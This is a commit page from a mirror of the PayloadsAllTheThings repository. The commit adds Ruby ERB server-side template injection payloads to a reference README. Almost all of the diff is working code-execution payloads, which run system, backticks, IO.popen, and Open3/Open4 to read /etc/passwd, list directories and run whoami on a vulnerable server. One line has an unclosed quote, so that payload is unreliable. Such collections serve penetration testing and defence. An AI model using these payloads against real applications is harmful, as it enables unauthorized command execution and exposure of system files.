ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-21 10:48:50 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update ERB SSTI tips

Browse Source
This commit is contained in:
meizjm3i 2020-05-29 12:28:55 +08:00
parent 5323ceb37c
commit 7670e2c36c
1 changed files with 6 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Server Side Template Injection/README.md
View File

@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine.
```ruby ```ruby
<%= system('cat /etc/passwd') %> <%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3 %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
``` ```
Execute code using SSTI for Slim engine. Execute code using SSTI for Slim engine.
```powershell ```powershell